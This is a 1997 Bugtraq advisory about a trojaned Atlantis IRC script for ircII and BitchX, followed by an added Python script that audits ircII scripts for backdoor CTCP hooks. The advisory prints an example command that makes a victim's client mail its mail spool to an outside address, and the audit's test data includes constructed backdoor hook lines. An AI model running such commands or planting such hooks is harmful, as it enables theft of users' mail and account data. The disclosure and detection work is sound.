Bugtraq mailing list archives
IRC script trojan with Unix based clients
From: bugtraq () LICJ SOROSCJ RO (Lista de securitate)
Date: Sat, 31 May 1997 01:03:21 +0300
This is a very strange trojan which affects Unix users (other OS-es may be affected as well) which use ircII or BitchX to link to irc servers. And in my country many system administrators do this. It was presented on the irc as amusement (how to kick off a listop with no access rights) but it may have more serious consequences.

Some versions of a very popular (at least in Romania) irc script (Atlantis) are trojan horses which implement new ctcp commands which allow other people on the irc world to execute irc commands in your client INCLUDING /DCC SEND AND /EXEC (if the client supports them).

Atlantis 1.2b is the best known version of the script and if used under ircII (Unix version, Linux tested) the user using these two can have the mail read by others.

Sample ircII prompt; noob victim, feur intruder:

    <feur> /ctcp noob version
    **** CTCP VERSION reply from noob: [AtlantiS(v1.2b)] by Dethnite
    <feur> /ctcp noob jupe exec cat $MAIL | mail raf () licj soroscj ro

In a similar way /etc/passwd can be sent, allowing the intruder to obtain information about the users on the system.

Other Atlantis versions seem to be affected as well. The only version that is clean is version 1.1. The BitchX client also "supports" the trojan.

--
Radu-Adrian Feurdean
raf () licj soroscj ro
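
An added example, not part of the original post and not code from Atlantis: a Python audit of ircII script text for ON CTCP hooks that run remote-supplied arguments, which is the behaviour the post describes. The sample hook lines and the XRUN command name are constructed for illustration; the check assumes ircII's ON CTCP parameter layout ($0 sender, $2 CTCP command, $3- arguments) and handles single-line hooks only.

```python
import re

# ircII hook syntax: ON [#][^|-|+]CTCP [serial] "<pattern>" <action>
# Inside an ON CTCP action, $0 is the sender, $1 the target, $2 the CTCP
# command and $3- its arguments, all of them chosen by the remote user.
HOOK = re.compile(r'^\s*/?on\s+#?[-^+]?ctcp\s+(?:\d+\s+)?[-^]?"([^"]*)"\s*(.*)$', re.I)
REMOTE = r'\$(?:\*|\d+-?)'
# Remote text used as the command itself (start of action, after "{" or ";").
AS_COMMAND = re.compile(r'(?:^|[{;])\s*/*\s*' + REMOTE)
# Remote text handed to a command that runs or sends something.
TO_RUNNER = re.compile(r'\b(eval|exec|dcc)\b[^;}]*' + REMOTE, re.I)


def audit_script(text):
    """Return (line number, CTCP pattern, reason) for each suspicious hook."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = HOOK.match(line)
        if not m:
            continue
        pattern, action = m.groups()
        if AS_COMMAND.search(action):
            findings.append((lineno, pattern, "remote argument executed as a command"))
            continue
        runner = TO_RUNNER.search(action)
        if runner:
            findings.append(
                (lineno, pattern, f"remote argument passed to {runner.group(1).upper()}"))
    return findings


# Constructed lines in ircII script syntax; they are not taken from Atlantis.
SAMPLE = '''\
# constructed sample script
on ^ctcp "% % JUPE *" {$3-}
on ^ctcp "% % PING *" {echo *** PING from $0}
on ^ctcp "% % XRUN *" {exec $3-}
alias wii {whois $0 $0}
'''

if __name__ == "__main__":
    for lineno, pattern, reason in audit_script(SAMPLE):
        print(f"line {lineno}: ON CTCP {pattern!r}: {reason}")
```

A hit is a reason to read the hook by hand; a script can split a hook over several lines or build the command indirectly, which this single-line check does not follow.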